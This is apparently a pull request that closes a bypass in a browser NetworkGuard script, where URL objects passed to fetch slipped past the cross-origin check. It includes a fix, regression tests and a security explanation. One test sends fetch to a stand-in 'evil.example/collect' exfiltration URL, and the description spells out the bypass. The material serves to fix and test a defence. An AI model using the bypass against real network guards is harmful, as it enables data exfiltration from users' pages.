### PR TITLE
fix: close NetworkGuard URL-object bypass

### DIFF
--- a/src/core/NetworkGuard.ts
+++ b/src/core/NetworkGuard.ts
@@ -62,23 +62,36 @@ function buildInitScript(options: NetworkGuardOptions): string {
 	var TALOX_NG_PROFILE = ${JSON.stringify(profileClass)};
 
 	if (TALOX_NG_LEVEL === 'off') return;
+	if (window.__taloxNetworkGuardInstalled === true) return;
 
 	// ── Helpers ──────────────────────────────────────────────────────────
 
+	function normalizeUrlInput(url) {
+		if (typeof url === 'string') return url;
+		if (url && typeof url.url === 'string') return url.url;
+		if (url && typeof url.href === 'string') return url.href;
+		try { return String(url); } catch(e) { return null; }
+	}
+
 	function isSameOrigin(url) {
+		var normalized = normalizeUrlInput(url);
+		if (normalized === null) return false;
 		try {
-			return new URL(url, location.href).origin === location.origin;
+			return new URL(normalized, location.href).origin === location.origin;
 		} catch(e) { return false; }
 	}
 
 	function isSpecialScheme(url) {
-		return /^(blob|data|javascript|about):/i.test(url);
+		var normalized = normalizeUrlInput(url);
+		return normalized !== null && /^(blob|data|javascript|about):/i.test(normalized);
 	}
 
 	function isAllowed(url) {
-		if (isSameOrigin(url) || isSpecialScheme(url)) return true;
+		var normalized = normalizeUrlInput(url);
+		if (normalized === null) return false;
+		if (isSameOrigin(normalized) || isSpecialScheme(normalized)) return true;
 		try {
-			var host = new URL(url, location.href).hostname;
+			var host = new URL(normalized, location.href).hostname;
 			for (var i = 0; i < TALOX_NG_ALLOW.length; i++) {
 				if (TALOX_NG_ALLOW[i] === '*' || host === TALOX_NG_ALLOW[i] || host.endsWith('.' + TALOX_NG_ALLOW[i])) {
 					return true;
@@ -130,7 +143,7 @@ function buildInitScript(options: NetworkGuardOptions): string {
 
 	var _origFetch = window.fetch;
 	window.fetch = function(url, init) {
-		var urlStr = typeof url === 'string' ? url : (url.url || '');
+		var urlStr = normalizeUrlInput(url);
 		if (!isAllowed(urlStr)) {
 			logBlocked('fetch', urlStr);
 			if (TALOX_NG_LEVEL === 'strict') {
@@ -164,6 +177,7 @@ function buildInitScript(options: NetworkGuardOptions): string {
 		return _origSend.apply(this, arguments);
 	};
 
+	window.__taloxNetworkGuardInstalled = true;
 })();`;
 }
 

--- a/tests/unit/NetworkGuardRuntime.test.ts
+++ b/tests/unit/NetworkGuardRuntime.test.ts
@@ -1,0 +1,99 @@
+import { describe, expect, it, vi } from "vitest";
+import { NetworkGuard } from "../../src/core/NetworkGuard.js";
+
+async function getGuardScript(): Promise<string> {
+	const scripts: string[] = [];
+	const guard = new NetworkGuard({ level: "strict", allowlist: [] });
+	await guard.inject({
+		async addInitScript(script: string): Promise<void> {
+			scripts.push(script);
+		},
+	});
+	return scripts[0]!;
+}
+
+function createRuntime() {
+	const originalFetch = vi.fn(async () => ({ ok: true }));
+	const sendBeacon = vi.fn(() => true);
+
+	class FakeWebSocket {
+		static CONNECTING = 0;
+		static OPEN = 1;
+		static CLOSING = 2;
+		static CLOSED = 3;
+		constructor(
+			public readonly url: string | URL,
+			public readonly protocols?: string | string[],
+		) {}
+	}
+
+	class FakeXMLHttpRequest {
+		open(): void {}
+		send(): void {}
+		abort(): void {}
+	}
+
+	const windowObject: Record<string, any> = {
+		fetch: originalFetch,
+		WebSocket: FakeWebSocket,
+	};
+	const navigatorObject = { sendBeacon };
+	const locationObject = {
+		href: "https://app.example.test/page",
+		origin: "https://app.example.test",
+	};
+	const consoleObject = {
+		error: vi.fn(),
+		warn: vi.fn(),
+	};
+
+	const execute = (script: string): void => {
+		const run = new Function(
+			"window",
+			"navigator",
+			"WebSocket",
+			"XMLHttpRequest",
+			"location",
+			"URL",
+			"console",
+			script,
+		);
+		run(windowObject, navigatorObject, FakeWebSocket, FakeXMLHttpRequest, locationObject, URL, consoleObject);
+	};
+
+	return { execute, windowObject, originalFetch, consoleObject };
+}
+
+describe("NetworkGuard runtime hardening", () => {
+	it("blocks cross-origin URL objects passed directly to fetch", async () => {
+		const script = await getGuardScript();
+		const runtime = createRuntime();
+		runtime.execute(script);
+
+		await expect(runtime.windowObject.fetch(new URL("https://evil.example/collect"))).rejects.toThrow(
+			"fetch blocked",
+		);
+		expect(runtime.originalFetch).not.toHaveBeenCalled();
+		expect(runtime.consoleObject.error).toHaveBeenCalledTimes(1);
+	});
+
+	it("still allows same-origin URL objects", async () => {
+		const script = await getGuardScript();
+		const runtime = createRuntime();
+		runtime.execute(script);
+
+		await runtime.windowObject.fetch(new URL("https://app.example.test/api"));
+		expect(runtime.originalFetch).toHaveBeenCalledTimes(1);
+	});
+
+	it("does not wrap fetch again when the init script executes twice", async () => {
+		const script = await getGuardScript();
+		const runtime = createRuntime();
+		runtime.execute(script);
+		const firstWrappedFetch = runtime.windowObject.fetch;
+
+		runtime.execute(script);
+
+		expect(runtime.windowObject.fetch).toBe(firstWrappedFetch);
+	});
+});


### PR DESCRIPTION
## Summary
- normalize browser URL inputs before NetworkGuard policy checks
- block cross-origin `URL` objects passed directly to `fetch()` in strict mode
- make the injected runtime guard actually idempotent when the init script executes more than once
- add runtime regression tests for cross-origin URL objects, same-origin URL objects, and double execution

## Security impact
`fetch(new URL("https://foreign.example/..."))` previously collapsed to an empty string because the guard only recognized strings and `Request.url`. The empty string was then resolved against the current page and treated as same-origin, allowing the cross-origin fetch through the page-context guard.

## Verification
The added runtime tests execute the generated init script against a small browser-like harness. They are designed to fail on the previous implementation: the cross-origin `URL` object reaches the original fetch and a second init-script execution wraps fetch again.

CI/Docker remain the merge gate.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Improved network request filtering for URL objects and other URL-like inputs.
  * Cross-origin requests are blocked consistently, while same-origin requests continue to work.
  * Prevented duplicate network protection from being applied when initialization runs more than once.

* **Tests**
  * Added coverage for URL-based fetch handling, cross-origin blocking, same-origin requests, and repeated initialization.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->